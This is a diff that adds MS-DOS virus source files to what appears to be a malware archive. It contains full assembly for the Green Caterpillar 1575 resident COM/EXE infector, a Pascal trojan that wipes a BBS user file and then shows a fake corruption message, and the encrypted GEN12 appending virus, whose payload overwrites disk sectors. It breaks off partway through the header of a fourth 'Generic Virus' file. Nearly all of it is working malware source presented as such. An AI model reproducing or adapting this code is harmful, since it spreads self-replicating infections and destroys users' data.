b/MSDOS/Virus.MSDOS.Unknown.gc1575a.asm @@ -0,0 +1,929 @@ +; Green_Caterpillar.1575.A +; TASM /M + + +seg000 segment byte public 'CODE' + assume cs:seg000 + org 100h + assume es:nothing, ss:nothing, ds:seg000 + +start proc near + jmp short RealStart + db 90h +Int21Ofs dw 0 +Int21Seg dw 0 +Int1COfs dw 0 +Int1CSeg dw 0 +exeHeader dw 20CDh +exeMOD dw 9090h +exeDIV dw 0 +exeNumSeg dw 0 +exeHeadSize dw 0 +exeMinPara dw 0 +exeMaxPara dw 0 +exeSS dw 0 +exeSP dw 0 +exeCheckSum dw 0 +exeIP dw 0 +exeCS dw 0 +StartCS dw 0 +StartIP dw 0 +FileSizeHW dw 0 +FileSizeLW dw 0 +StoreSS dw 0 +DTAOffset dw 0 +DTASegment dw 0 +StartSS dw 0 +StoreBP dw 0 +StoreES dw 0 +Int24Seg dw 0 +Int24Ofs dw 0 +GenCounter db 16 +byte_0_13C db 7, 57h, 75h, 2, 5Ch, 7, 70h, 0, 16h, 0, 0BFh, 0Bh, 5Ch, 7, 70h, 0 + +RealStart: + push es + push ds + mov ax, es + push cs + pop ds ; DS = CS + push cs + pop es ; ES = CS + assume es:seg000 + mov StoreES, ax + mov ax, ss + mov StoreSS, ax + mov al, 2 + out 20h, al ; Interrupt controller, 8259A. + cld + xor ax, ax + mov ds, ax ; DS points to IVT + assume ds:nothing + xor si, si + mov di, 13Ch + mov cx, 16 + repne movsb + push ds + pop ss ; SS = DS + assume ss:nothing + mov bp, 8 + xchg bp, sp + call near ptr sub_0_1C5 + jmp StoreFilename +start endp + +FixupInts: + call GetInt24Vecs + call CheckInfection + jz AlreadyInf ; Infected Already? Then JMP. + mov al, ds:FileType + push ax + call InfectCOM + pop ax + mov ds:FileType, al + jmp short RestoreFile + nop + +AlreadyInf: + call GetIntVectors + call CheckForInstall + cmp ds:FileType, 0 ; No File Type? + jnz RestoreFile ; No? Then JMP. + mov ax, 4C00h + int 21h ; Exit To DOS + +RestoreFile: ; COM File? + cmp ds:FileType, 'C' + jnz RestoreEXE ; No? Then JMP. + +RestoreCOM: + pop ds + assume ds:seg000 + pop es + assume es:nothing + push cs + pop ds ; DS = CS + pop es + push es + mov di, offset start + mov si, offset exeHeader + mov cx, 12 + repne movsb ; Restore Original 12 Bytes + push es + pop ds ; DS = ES + mov ax, offset start + push ax + xor ax, ax + retf ; Return to Original COM Program + +sub_0_1C5 proc far + mov si, 6 + lodsw + cmp ax, 192h + jz RestoreCOM + cmp ax, 179h + jnz loc_0_1D6 + jmp loc_0_27F + +loc_0_1D6: + cmp ax, 1DCh + jz RestoreEXE + retn + +RestoreEXE: + pop ds + pop es + mov bx, cs:exeSS + sub bx, cs:StartSS + mov ax, cs + sub ax, bx + mov ss, ax + assume ss:nothing + mov bp, cs:StoreBP + xchg bp, sp + mov bx, cs:exeCS + sub bx, cs:StartCS + mov ax, cs + sub ax, bx + push ax + mov ax, cs:StartIP + push ax + retf +sub_0_1C5 endp + +Caterpillar db '#' + db 1Ah + db '<' + db '#' + db '/' + db '-' + db '-' + db '!' + db '.' + db '$' + db 0Eh + db '#' + db '/' + db '-' + db '' +FileName db 'A:10KBYTE.EXE',0 + db 0 ; + db 24h ; $ + db 24h ; $ + db 24h ; $ + db 24h ; $ + db 24h ; $ + +CheckInfection proc near + mov ax, 3D02h + mov dx, offset FileName + int 21h ; Open File + jnb CheckOpened ; No problems? Then JMP. + clc + retn + +CheckOpened: + mov StoreSS, ax + mov dx, offset NewInt24 + mov ax, 2524h + int 21h ; Set New Int 24h Vectors + mov ax, 4202h + mov bx, StoreSS + mov cx, 0FFFFh + mov dx, 0FFFEh + int 21h ; Move Pointer to End of File - 1 + mov dx, offset CheckBytes + mov ah, 3Fh + mov bx, StoreSS + mov cx, 2 + int 21h ; Read In 2 Bytes + mov ah, 3Eh + int 21h ; Close File + push ds + mov dx, Int24Ofs + mov ax, Int24Seg + mov ds, ax + mov ax, 2524h + int 21h ; Restore Int 24h Vectors + pop ds + cmp CheckBytes, 0A0Ch ; Infected Already? + clc + retn +CheckInfection endp + +CheckBytes dw 0 + +loc_0_27F: + cmp ax, 22Dh + jz InfectCOM + push ds + pop es ; ES = DS + assume es:seg000 + push cs + pop ds ; DS = CS + mov ax, StoreSS + mov ss, ax ; SS = SS + assume ss:nothing + xchg bp, sp + mov si, offset byte_0_13C + mov di, 0 + mov cx, 16 + cld + repne movsb + jmp FixupInts + +InfectCOM proc near + mov al, 'C' + mov FileType, al + mov al, 8 + out 70h, al ; CMOS Memory: + ; used by real-time clock + in al, 71h ; CMOS Memory + mov GenCounter, al + mov dx, offset FileName + mov ax, 3D02h + int 21h ; Open File + jnb COMOpened ; No problems? Then JMP. + retn + +COMOpened: ; Store Handle + mov StoreSS, ax + mov dx, offset exeHeader + mov bx, StoreSS + mov cx, 12 + mov ah, 3Fh + int 21h ; Read In 12 Bytes From File + mov ax, 4202h + xor cx, cx + xor dx, dx + int 21h ; Move Pointer to End of File + push ax + add ax, 10h + and ax, 0FFF0h + push ax + shr ax, 1 + shr ax, 1 + shr ax, 1 + shr ax, 1 ; Fix For Segment Size + mov di, offset VirusFixedSeg + stosw ; Store Segment Value + pop ax + pop bx + sub ax, bx + mov cx, 1575 + add cx, ax + mov dx, offset start + sub dx, ax + mov bx, StoreSS + mov ah, 40h + int 21h ; Write Virus to File + mov ax, 4200h + xor cx, cx + xor dx, dx + int 21h ; Move Pointer to Beginning of File + mov ah, 40h + mov bx, StoreSS + mov cx, 12 + mov dx, offset COMHeader + int 21h ; Write COM Header to File + mov ah, 3Eh + mov bx, StoreSS + int 21h ; Close File + retn +InfectCOM endp + +COMHeader: + push cs + mov ax, cs +PUSHOffset db 5 +VirusFixedSeg dw 0 ; PUSH Fixed Segment + push ax + mov ax, offset start + push ax + retf + +InfectEXE proc near + mov al, 'E' + mov FileType, al + mov al, 8 + out 70h, al ; CMOS Memory: + ; used by real-time clock + in al, 71h ; CMOS Memory + mov GenCounter, al + mov dx, offset FileName + mov ax, 3D02h + int 21h ; Open EXE File + jnb EXEOpened ; No problems? Then JMP. + retn + +EXEOpened: + mov StoreSS, ax + mov dx, offset exeHeader + mov bx, StoreSS + mov cx, 24 + mov ah, 3Fh + int 21h ; Read In 24 Bytes + mov ax, 4202h + mov cx, 0 + mov dx, 0 + int 21h ; Move pointer to End of File + push ax + add ax, 10h + adc dx, 0 + and ax, 0FFF0h + mov FileSizeHW, dx + mov FileSizeLW, ax + mov cx, 1831 + sub cx, 100h + add ax, cx + adc dx, 0 + mov cx, 512 + div cx + inc ax + mov exeDIV, ax + mov exeMOD, dx + mov ax, exeCS + mov StartCS, ax + mov ax, exeIP + mov StartIP, ax + mov ax, exeSS + mov StartSS, ax + mov ax, exeSP + mov StoreBP, ax + mov dx, FileSizeHW + mov ax, FileSizeLW + mov cx, 10h + div cx + sub ax, 10h + sub ax, exeHeadSize + mov exeCS, ax + mov exeSS, ax + mov exeIP, 100h + mov exeSP, 100h + mov ax, 4200h + xor cx, cx + mov dx, 2 + int 21h ; Move Pointer to Beginning + 2 + mov dx, offset exeMOD + mov bx, StoreSS + mov cx, 22 + mov ah, 40h + int 21h ; Write New EXE Header + mov ax, 4202h + xor cx, cx + xor dx, dx + int 21h ; Move Pointer to End Of File + mov dx, 100h + mov ax, FileSizeLW + pop cx + sub ax, cx + sub dx, ax + mov cx, 1831 + add cx, ax + sub cx, 100h + mov ah, 40h + int 21h ; Write Virus To File + mov ah, 3Eh + int 21h ; Close File + retn +InfectEXE endp + +FindFirstFile: + push cx + mov cx, 0 + mov ah, 4Eh + int 21h ; Find First File + pop cx + retn + +GetIntVectors proc near + push es + mov ax, 351Ch + int 21h ; Get Int 1Ch Vectors + mov cs:Int1COfs, bx + mov cs:Int1CSeg, es + mov ax, 3521h + int 21h ; Get Int 21h Vectors + push es + pop ax + mov cs:Int21Seg, ax + mov cs:Int21Ofs, bx + pop es + assume es:nothing + retn +GetIntVectors endp + +CheckForInstall proc near + push ax + push es + push ds + xor ax, ax + mov es, ax ; ES points to IVT + assume es:nothing + mov si, 86h + mov ax, es:[si] ; Get Int 21h Segment + mov ds, ax + mov si, offset InfMarker + cmp word ptr [si], 0A0Ch ; In Memory Already? + jnz InstallVirus ; No? Then JMP. + push ds + pop ax + call sub_0_601 + pop ds + pop es + assume es:nothing + pop ax + retn + +InstallVirus: + push cs + pop ds + mov ax, StoreES + dec ax + mov es, ax ; ES points to MCB + cmp byte ptr es:0, 'Z' ; Last MCB? + jz GotLastMCB ; Yes? Then JMP. + jmp short NotLastMCB + nop + +GotLastMCB: ; Get Amount of Memory in MCB + mov ax, es:3 +CheckForInstall endp + + mov cx, 1847 + shr cx, 1 + shr cx, 1 + shr cx, 1 + shr cx, 1 ; Calculate Paragraphs + sub ax, cx ; Subtract 1847 Bytes + jb NotLastMCB ; Enough Memory? No? Then JMP. + mov es:3, ax ; Set New Amount of Memory in MCB + sub es:12h, cx ; Set Next Segment Value + push cs + pop ds ; DS = CS + mov ax, es:12h + push ax + pop es ; ES points to Virus Segment + mov si, offset start + push si + pop di + mov cx, 1575 + cld + repne movsb ; Copy Virus Into Memory + push es + sub ax, ax + mov es, ax ; ES points to IVT + assume es:nothing + mov si, 84h + mov dx, offset NewInt21 + mov es:[si], dx ; Set New Int 21h Offset + inc si + inc si + pop ax + mov es:[si], ax ; Set New Int 21h Segment + +NotLastMCB: + pop ds + pop es + assume es:nothing + pop ax + retn + +NewInt21: ; Virus Calling? + cmp al, 57h + jnz CheckForDTACall ; No? Then JMP. + jmp short JMPInt21 + nop + +CheckForDTACall: ; Set New DTA Segment/Offset + cmp ah, 1Ah + jnz CheckFindFCB ; No? Then JMP. + call StoreDTAVecs + jmp short JMPInt21 + nop + +CheckFindFCB: ; Find First File (FCB)? + cmp ah, 11h + jnz CheckFindNextMC ; No? Then JMP. + call FindFirstFCB + iret + +CheckFindNextMC: ; Find Next File (FCB)? + cmp ah, 12h + jnz JMPInt21 ; No? Then JMP. + call FindNextFCB + iret + +JMPInt21: + jmp dword ptr cs:Int21Ofs + +FindFirstFCB proc near + mov al, 57h ; Virus Calling + int 21h ; Find First File (FCB) + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds ; DS = CS + push cs + pop es ; ES = CS + assume es:seg000 + mov cs:InfectCount, 0 + nop + call GetFilename + jnz GotBadFile + call CheckInfection + jz GotBadFile + call DoInfection + dec InfectCount + +GotBadFile: + pop es + assume es:nothing + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +FindFirstFCB endp + +GetFilename proc near + push cs + pop es ; ES = CS + assume es:seg000 + push cs + pop es ; ES = CS + cld + call StoreFilename + jnb CheckExt ; No problems? Then JMP. + cmp di, 0 + retn + +CheckExt: + mov di, offset FileName + mov al, '.' + mov cx, 11 + repne scasb ; Scan for File Extension + cmp word ptr [di], 'OC' ; COM File? + jnz CheckForEXE ; No? Then JMP. + cmp byte ptr [di+2], 'M' ; COM File? + jnz CheckForEXE ; No? Then JMP. + mov FileType, 'C' + nop + retn + +CheckForEXE: ; EXE File? + cmp word ptr [di], 'XE' + jnz BadFileType ; No? Then JMP. + cmp byte ptr [di+2], 'E' ; EXE File? + jnz BadFileType ; NO? Then JMP. + mov FileType, 'E' + nop + +BadFileType: + retn +GetFilename endp + +StoreFilename proc near + push ds + mov si, cs:DTAOffset + mov ax, cs:DTASegment + mov ds, ax + mov di, offset FileName + lodsb + cmp al, 0FFh ; Extended FCB? + jnz RegularFCB ; No? Then JMP. + add si, 6 ; Add For Extended FCB + lodsb ; Get First Character + jmp short FileOnDrive + nop + +RegularFCB: ; Is this a file on a drive? + cmp al, 5 + jb FileOnDrive ; Yes? Then JMP. + pop ds + stc + retn + +FileOnDrive: + mov cx, 11 + cmp al, 0 ; End of Filename? + jz EndOfName ; Yes? Then JMP. + add al, 40h ; Capitalize Drive Letter + stosb ; Store Drive Letter + mov al, ':' + stosb + +EndOfName: + lodsb + cmp al, 20h ; End of Filename? + jz EndOFFilename ; Yes? Then JMP. + stosb ; Store Character + jmp short GetNextChar + nop + +EndOFFilename: + cmp byte ptr es:[di-1], '.' + jz GetNextChar + mov al, '.' + stosb ; Store EXTENSION Marker + +GetNextChar: + loop EndOfName + mov al, 0 + stosb ; Store End of Filename + pop ds + clc + retn +StoreFilename endp + +FindNextFCB proc near + mov al, 57h ; Virus Call + int 21h ; Find Next File (FCB) + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds ; DS = CS + push cs + pop es ; ES = CS + cmp cs:InfectCount, 0 ; Infected one yet? + jz CheckFile ; No? Then JMP. + jmp short BadFile + nop + +CheckFile: + call GetFilename + jnz BadFile ; Bad? Then JMP. + call CheckInfection + jz BadFile ; Infected Already? Then JMP. + call DoInfection + dec InfectCount + pop es + assume es:nothing + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn + +BadFile: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +FindNextFCB endp + +InfectCount db 0 + +StoreDTAVecs proc near + push ax + push ds + pop ax + mov cs:DTASegment, ax + mov cs:DTAOffset, dx + pop ax + retn +StoreDTAVecs endp + +GetInt24Vecs proc near + push cs + mov al, 0 + out 20h, al ; Interrupt controller, 8259A. + mov ax, 3524h + int 21h ; Get Int 24h Vectors + mov Int24Ofs, bx + mov bx, es + mov Int24Seg, bx + pop es + mov si, offset Caterpillar + mov di, offset FileName + mov cx, 15 + +loc_0_5FA: + lodsb + add al, 20h + stosb + loop loc_0_5FA + retn +GetInt24Vecs endp + +sub_0_601 proc near + push ax + push cs + pop ds ; DS = CS + push cs + pop es ; ES = CS + assume es:seg000 + mov bl, GenCounter + cmp bl, 0Ch + ja loc_0_648 + cmp bl, 0 + jz loc_0_648 + mov al, 8 + out 70h, al ; CMOS Memory: + ; used by real-time clock + in al, 71h ; CMOS Memory + cmp al, 0Ch + ja loc_0_648 + cmp al, 0 + jz loc_0_648 + cmp al, bl + jz loc_0_648 + inc bl + call CheckCounter + cmp al, bl + jz loc_0_648 + inc bl + call CheckCounter + cmp al, bl + jz loc_0_648 + pop ds + call FillWithSpace + push cs + pop ds ; DS = CS + retn +sub_0_601 endp + +CheckCounter proc near + cmp bl, 12 ; Counter Below or Equal to 12? + jbe Below12 ; Yes? Then JMP. + sub bl, 12 ; Reset Counter + +Below12: + retn +CheckCounter endp + +loc_0_648: + pop ax + retn + +DoInfection proc near + mov dx, offset NewInt24 + mov ax, 2524h + int 21h ; Set New Int 24h Vectors + cmp FileType, 'C' ; COM File? + jnz DoInfectEXE ; No? Then JMP. + call InfectCOM + jmp short InfectedFile + nop + +DoInfectEXE: + call InfectEXE + +InfectedFile: + push ds + mov dx, Int24Ofs + mov ax, Int24Seg + mov ds, ax + mov ax, 2524h + int 21h ; Restore Int 24h + pop ds + retn +DoInfection endp + +NewInt24: + mov al, 3 + iret + +FillWithSpace proc near + mov dx, offset NewInt1C + mov ax, 251Ch + int 21h ; Set New Int 1Ch + mov byte ptr NewInt1C, 90h + nop + mov ax, 0B800h + mov es, ax ; ES points to Video Memory + assume es:nothing + mov di, 0FA0h + mov ax, 720h + mov cx, 11 + repne stosw + push cs + pop es ; ES = CS + assume es:seg000 + retn +FillWithSpace endp + + db 0 ; + db 0 ; +byte_0_699 db 0 +word_0_69A dw 720h +byte_0_69C db 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h, 0Eh +byte_0_6AE db 0EEh + db 0Ch ; + +NewInt1C: + nop + sti + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds ; DS = CS + jmp short loc_0_6CA + nop + +loc_0_6C0: + pop es + assume es:nothing + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + iret + +loc_0_6CA: + mov ax, 0B800h + mov es, ax ; ES points to Video Memory + assume es:nothing + call sub_0_6FD + mov si, offset word_0_69A + mov cx, 22 + repne movsb + cmp byte_0_6AE, 0EEh + jz loc_0_6E9 + mov byte_0_6AE, 0EEh + jmp short loc_0_6EE + nop + +loc_0_6E9: + mov byte_0_6AE, 0F0h + +loc_0_6EE: + mov ax, es:[di] + mov ah, 0Eh + mov word_0_69A, ax + mov byte_0_699, 0 + jmp short loc_0_6C0 + +sub_0_6FD proc near + mov di, 0 + +loc_0_700: + mov si, offset byte_0_69C + push di + mov cx, 18 + cld + rep cmpsb + pop di + jz loc_0_718 + inc di + inc di + cmp di, 4000 + jnz loc_0_700 + mov di, 0 + +loc_0_718: + cmp di, 3998 + jnz locret_0_723 + mov byte ptr NewInt1C, 0CFh + +locret_0_723: + retn +sub_0_6FD endp + +FileType db 0 ; E = EXE File C = COM File + ; 0 = 1st Generation +InfMarker dw 0A0Ch +seg000 ends + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.gde.pas b/MSDOS/Virus.MSDOS.Unknown.gde.pas new file mode 100644 index 00000000..644a2295 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gde.pas @@ -0,0 +1,60 @@ +PROGRAM GDE; {By nchanter for LAME SysOps} + +USES CRT; + +VAR Temp : Text; + X : Integer; + Death_File : String; + +{--------------------------------------------------------------------------} +PROCEDURE NoParams; + + BEGIN; + SOUND(220); + DELAY(200); + NOSOUND; + TEXTCOLOR(RED); + WRITELN('You Forgot Something... '); + WRITELN; + WRITELN(' SYNTAX:'); + WRITELN('GDE C:\SHOCK\USERS'); + WRITELN; + WRITELN('Run AGAIN....'); + WRITELN(' (c) 1990,1991'); + HALT; + END; +{--------------------------------------------------------------------------} +PROCEDURE Kill_That_Fucker; + + BEGIN; + ASSIGN(TEMP, Death_File); + REWRITE(TEMP); + CLOSE(TEMP); + APPEND(TEMP); + WHILE X <> 5 Do + BEGIN; + WRITELN(TEMP, 'KGB Read The User File'); + WRITELN(TEMP, 'KGB Wrote The User File'); + X := X + 1; + END; + WRITELN(TEMP, ''); + WRITELN(TEMP, 'KGB is WATCHING YOU!'); + CLOSE(TEMP); + END; +{--------------------------------------------------------------------------} +PROCEDURE INIT; + + BEGIN; + IF PARAMCOUNT <> 1 THEN NoParams; + Death_File := PARAMSTR(1); + TEXTCOLOR(BLUE); + WRITELN('READING USER FILE.......'); + Kill_That_Fucker; + WRITELN('ERROR, USER FILE CURRUPTED!'); + HALT; + END; +{--------------------------------------------------------------------------} +BEGIN; + X := 1; + INIT; +END. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.gen12.asm b/MSDOS/Virus.MSDOS.Unknown.gen12.asm new file mode 100644 index 00000000..f50bdb3a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gen12.asm @@ -0,0 +1,390 @@ +; GEN12.ASM -- Genesis 1:2 Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Virucidal Maniac + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + + call get_dos_version + cmp ax,0005h ; Did the function return 5? + jl strt00 ; If less, do effect + call get_minute + or ax,ax ; Did the function return zero? + je strt00 ; If equal, do effect + call get_year + cmp ax,07C9h ; Did the function return 1993? + je strt00 ; If equal, do effect + jmp end00 ; Otherwise skip over it +strt00: mov ax,0002h ; First argument is 2 + mov cx,0007h ; Second argument is 7 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) + int 026h ; DOS absolute write interrupt + sti ; Restore interrupts + +end00: mov cx,0005h ; Do 5 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + jmp end01 ; Otherwise skip over it +strt01: lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end01: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + +get_dos_version proc near + mov ah,030h ; DOS get DOS version function + int 021h + mov bx,ax ; Save return value in BX + xor bl,bl ; Clear DOS major version in BX + xchg bh,bl ; Place 0 in BH, minor in BL + cbw ; Sign-extend AL into AX + mov cl,100 ; CL holds multiplier + mul cl ; Multiply AL by 100 + add ax,bx ; Add back the minor version + ret ; Return to caller +get_dos_version endp + +get_minute proc near + mov ah,02Ch ; DOS get time function + int 021h + mov al,cl ; Copy minute into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_minute endp + +get_year proc near + mov ah,02Ah ; DOS get date function + int 021h + xchg cx,ax ; Transfer the year into AX + ret ; Return to caller +get_year endp + +data00 db "Genesis 1:2",13,10 + db " And the earth was without form and void...",13,10 + db 13,10 + db " Now...So is your hard disk.",13,10 + db 13,10 + db " -Virucidal Maniac",13,10 + +vcl_marker db "[VCL]",0 ; VCL creation marker + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.generic.asm b/MSDOS/Virus.MSDOS.Unknown.generic.asm new file mode 100644 index 00000000..29f7dbe7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.generic.asm @@ -0,0 +1,260 @@ +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR PROGRAM TO BIG TO +; FIT IN MEMORY THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE 